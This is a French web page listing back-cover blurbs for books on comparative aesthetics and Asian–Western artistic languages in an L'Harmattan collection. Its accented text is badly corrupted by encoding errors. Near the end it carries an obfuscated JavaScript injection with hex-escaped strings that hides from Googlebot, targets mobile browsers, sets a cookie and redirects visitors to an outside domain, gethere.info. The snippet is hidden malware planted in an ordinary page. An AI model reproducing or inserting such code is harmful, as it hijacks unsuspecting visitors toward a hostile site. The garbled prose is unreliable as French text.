4e de couv. des parutions « Langages artistiques » (2009-2013)

/ 2015

a�? PoA�tique de la musique chinoise, VA�ronique Alexandre Journeau, publiA� avec le soutien du Creops (UniversitA� Paris-Sorbonne) et de Langarts, Paris, La��Harmattan, coll. La��univers esthA�tique, 2015, 443 pages. Prix public : 39 a��.

A�A�Dans la pensA�e chinoise, la musique est une partie du monde, sinon le monde lui-mA?me en ses manifestations sonores. A�uvre humaine, elle constitue la��essence de la culture, au mA?me titre que la��A�criture ou la peinture, mais elle est avant cela la��expression de la nature, voire du e?�A�dao qui gA�nA?re les A?tres et leur confA?re leurs normes de fonctionnement cycliqueA�A� (prA�face de RA�mi Mathieu). La��ouvrage est ainsi une approche par la voie musicale da��un univers qui sa��avA?re A?tre, A� considA�rer les fondements esthA�tiques chinois, un vA�ritable entrelacs des arts. Il est aussi fondA� sur le constat que la poA�sie chinoise a��A�A� la fois un langage artistique et un langage sur la��artA�a�� en rA�vA?le des aspects essentiels A� une comprA�hension fine de la pensA�e musicale et du geste artistique. DA?s lors, un tiers de poA?mes, un tiers da��illustrations et un tiers de texte thA�orique et technique, trame tissA�e da��explicitations directes et brodA�e da��A�vocations mA�taphoriques dans une divulgation sans A�puisement du sens, ont paru un dosage A� la fois naturel et propice A� la vulgarisation.

/ 2013

a�? Notions esthA�tiquesA�: rA�sonances entre les arts et les cultures, VA�ronique Alexandre Journeau, Muriel Detrie, Akinobu Kuroda et Laurent Mattiussi A�ds., Paris, La��Harmattan, coll. La��univers esthA�tique, 2013, 412 pages. Prix public : 39,50 a��. PubliA� avec le soutien du RA�seau Asie & Pacifique (CNRS/FMSH), du CERC (UniversitA� Sorbonne nouvelle, Paris 3) et de MARGE (UniversitA� Jean Moulin, Lyon 3).

Ouvrage en quatre parties : I-c?zA�shA�n, des esprits au divin, II-Du divin au sublime, III-???A�/A�e?S yA?u, la��errance, la��improvisation, IV-e��A�xu / c�?A�kong, le vide, le nA�ant.

La��esthA�tique, en tant que discipline philosophique traitant de la��art nA�e au sein de la culture occidentale, na��a A�tA� introduite que tardivement dans les autres cultures, notamment asiatiques, oA? existaient pourtant de longue date des notions, formulA�es dans leurs langues pour rendre compte de la��expA�rience esthA�tique et A�valuer lesA�A�uvres artistiques. Alors, ne peut-on trouver, sinon des concordances terme A� terme, du moins des rA�sonances entre langages artistiques entre la��Asie et la��OccidentA�? Tel est le pari qui sous-tend le recueil de textes rassemblA�s ici. Le parcours commence par un terme chinois couramment utilisA� dans les arts da��Asie orientale pourA�dA�signer le degrA� suprA?me da��excellence artistique, c?zA�shA�nce qui suscite naturellement un retour sur ces notionsA�e?S you, prA�gnant dans les discours sur la��art et en poA�sie et qui, comme espace de libertA� et de pA�rA�grination sans fin de la��esprit, ouvre sur les notions da��errance et da��improvisation. En troisiA?me infinitude, au-delA� du plein ou du nA�ant, une notion clA� en Asie comme ne Occident, le vide,A� e��A�xuA�ou A�c�?A�kong, fortement influencA�e par la��introduction du bouddhisme venu da��Inde. Le terme de rA�sonance serait sans doute le plus A� mA?me de rendre compte de ce phA�nomA?ne de mise en mouvement de la��esprit au contact de la��autre qui oblige au dA�passement de ses limites et A� la��inventivitA�. Puissent les articles rA�unis ici, par les multiples A�chos et interrogations dont ils sont porteurs, trouver aussi leur rA�sonance chez le lecteur et ouvrir la voie da��une esthA�tique comparA�e encore A� inventer.

/ 2012

a�? MA�taphores et culturesA�: en mots et en images, Postface da��A�ric Dayre, VA�ronique Alexandre Journeau, Violaine Anger, Florence Lautel-Ribstein et Laurent Mattiussi A�ds., Paris, La��Harmattan, coll. La��univers esthA�tique, 2012, 399 pages. Prix public : 39 a��. PubliA� avec le soutien du RA�seau Asie & Pacifique (CNRS/FMSH), de l’OMF (UniversitA� Paris Sorbonne, Paris 4), de MARGE (UniversitA� Jean Moulin, Lyon 3) et du CERCC (ENS Lyon).

Ouvrage en deux parties : I-Refonder le concept A�A�mA�taphoreA�A� en linguistiqueA� et en littA�rature, II-Discerner le phA�nomA?ne A�A�mA�taphoreA�A� dans les langages artistiques.

Cet ouvrage relA?ve un dA�fiA�: partager un thA?me difficile en soi, la mA�taphore, entre langages et entre cultures. Ce concept suscite maints dA�bats depuis son A�mancipation du berceau originel (Aristote), par son poids dans les domaines qui la��ont forgA� (linguistique et littA�rature)A�en OccidentA�; ca��est aussi un phA�nomA?ne nouvellementA�perceptible dans les langages artistiques et renouvelA� par la tradition asiatique. Ce premier pas dans une recherche interdisciplinaire et interculturelle initiA�e par la��axe scientifique A�A�Langages artistiques Asie-OccidentA�A� a pour objectif da��explorer comment fonctionne le processus mA�taphorique. Il est A� multiples facettes, comme un nuage est multiforme, fluctuant, aux contours flous, mobile et changeant au grA� du vent et des cortA?ges de nuages, celui oA? il est et ceux qua��il cA?toie,A�chacun naviguantA�dans le ciel A� des rythmes diffA�rents avec des nuances variables. La problA�matique de la mA�taphore, selon le langage (poA�tique, musical, picturala��) et la��horizon culturel, est de cet ordre. Comme le nuage qui vogue da��un endroit A� la��autre, crA�ant du visible et de la��invisible de faA�on indA�terminA�e et non permanente, la mA�taphore crA�eA�un pont vers un au-delA� du sens. La��ambition est de la��observer sous divers anglesA�(y compris anthropologique et cognitif)A�: il sa��avA?re qua��elle rA�alise une transposition esthA�tique du monde inhA�rente au genre humain mais propre A� chaque culture.

/ 2011

a�? Le Surgissement crA�ateurA�: jeu, hasard ou inconscient, PrA�face de Menene Gras, Postface de DaniA?le Pistone, VA�ronique Alexandre Journeau A�d., Paris, La��Harmattan, coll. La��univers esthA�tique, 2011, 298 pages. Prix public : 29,50 a��. PubliA� avec le soutien du RA�seau Asie & Pacifique (CNRS/FMSH) et de l’OMF (UniversitA� Paris Sorbonne).

Ouvrage en quatre partiesA�: I-La place du jeu en crA�ation, II-Le jeu avec la��inconscient dans les arts de la scA?ne, III-Hasard et inconscient crA�ateur dans la musique et les arts plastiques, IV-La��apport des neurosciences cognitives en esthA�tique. Ouvrage rA�compensA� par un prix 2012 du Syndicat de la critique de musique, de thA�A?tre et de danse.

La crA�ation artistique est la��un des phA�nomA?nes les plus complexes et les plus mystA�rieux de la��activitA� humaine, notamment parce que ca��est toute la richesse des cultures qua��elle met en A�uvre, en regard et en correspondances. Un premier ouvrage proposait da��A�tudier si la��approche de la qualitA� da��une A�uvre par la��A�A�effet de vieA�A�, invariant mis en A�vidence par Marc-Mathieu MA?nch pour le domaine littA�raire, sa��applique A� la musiqueA�: Musique et effet de vieA�; puis le corollaire le plus important de la��effet deA�vie, la A�A�cohA�renceA�A�, en A�largissant du texte A� la musique et de la littA�rature aux artsA�: Arts, Langue et cohA�rence. La troisiA?me rencontre scientifique organisA�e par leA�RA�seau Asie-Imasie (CNRSA�/A�FMSH) et la��Observatoire musical franA�ais (OMF) de la��universitA� Paris-Sorbonne, posait que la��impulsion crA�atrice provenait du jeu, par hasard ou dans la��inconscient. Il semblerait que le surgissement crA�ateur se produise dans un entre-deux, le va-et-vient entre la��inconscient et le conscient ouA�leA�basculement de la��intuition en intention, voire un entre-trois quand le hasard sa��en mA?le.

/ 2010

a�? Arts, langue et cohA�rence, VA�ronique Alexandre Journeau A�d., Paris, La��Harmattan, coll. La��univers esthA�tique, 2010, 258 pages. Prix public : 24 a��. PubliA� avec le soutien du RA�seau Asie & Pacifique (CNRS/FMSH) et de l’OMF (UniversitA� Paris Sorbonne).

Ouvrage en trois partiesA�: I-Du texte A� la musique, II-De la littA�rature aux arts, III-Perspectives.

Ce deuxiA?me ouvrage de la collection La��univers esthA�tique poursuit la rA�flexion sur la thA�orie de la��effet de vie en A�tudiant la cohA�rence da��une A�uvre da��art. Marc-Mathieu MA?nch qui en a fait un corollaire essentiel de la��effet de vie part du principe que A�A�l’esprit humain a naturellement tendance A� chercher l’ordre et A� fuir le chaosA�A�. C’est mA?me, selon Alberti, A�A�la loi absolue et premiA?re de la natureA�A�. Comment la cohA�rence est-elle conA�ue par le crA�ateur, est-elle perA�ue par le rA�cepteurA�? En cherchant si la��exigence de cohA�rence a��A�qui fonde la qualitA� da��un texte des points de vue de la langue et de la littA�ratureA�a�� est une vA�ritable rA?gle acceptA�e dansA� diffA�rents arts et civilisations, les articles prA�sentA�s dans cet ouvrage abordent des angles de vue complA�mentaires dans la��espace, de la��Occident A� la Chine, et le temps, de la��ancien au contemporain. En proposant un thA?me unificateur partagA� entre une variA�tA� des genres, du texte A� la musique et de la littA�rature aux arts, la��ensemble contribue A� poser les jalons da��une voie comparatiste interdisciplinaire.

/ 2009

a�? Musique et effet de vie, PrA�face de DaniA?le Pistone, VA�ronique Alexandre Journeau A�d., Paris, La��Harmattan, coll. La��univers esthA�tique, 2009, 227 pages. Prix public : 21,50 a��. PubliA� avec le soutien du RA�seau Asie & Pacifique (CNRS/FMSH) et de l’OMF (UniversitA� Paris Sorbonne).

Ouvrage en deux partiesA�: I-Les trois A�tapes de la vie da��une A�uvre, II-La mise A� la��A�preuve de la thA�orie de la��effet de vie.

Ce premier ouvrage de la collection La��univers esthA�tique inaugure l’application de la thA�orie gA�nA�rale de la��effet de vie – dA�couverte par Marc-Mathieu MA?nch pour le domaine littA�raire – A� la musique, en prA�lude A� une A�tude gA�nA�ralisA�e aux arts. Cette thA�orie postule un invariant universel comme rA�vA�lateur de la qualitA� d’une A�uvreA� A�A�l’effet de vieA�A�. L’A�uvre d’art rA�ussie serait celle qui crA�e un effet de vie dans la psychA� du rA�cepteur : s’il est rA�ussi, il gA�nA?re une intensitA� de vie, une effervescence capable de saisir et de mettre en cohA�rence toutes les facettes d’un esprit. C’est un systA?me d’A�chos intA�rieurs, un bouillonnement de l’A?me dA� A� un stimulus qui n’est qu’un artefact, mais un artefact aussi puissant que la vie elle-mA?me dans les moments oA? celle-ci touche toutes les facettes de l’esprit cerveau (le cA�ur-esprit pourA� les asiatiques). La thA�orie de l’effet de vie dA�finirait donc la qualitA�, voire la perfection d’une A�uvre d’art. Elle ne serait pas seulement dans l’harmonie, l’A�quilibre, le nombre d’or, la mimA�sis, la fantaisie ou ailleurs… mais essentiellement dans la plA�nitude d’un esprit rA�cepteur prA�vu par un esprit crA�ateur.

 

 

 var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Vous aimerez aussi...

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *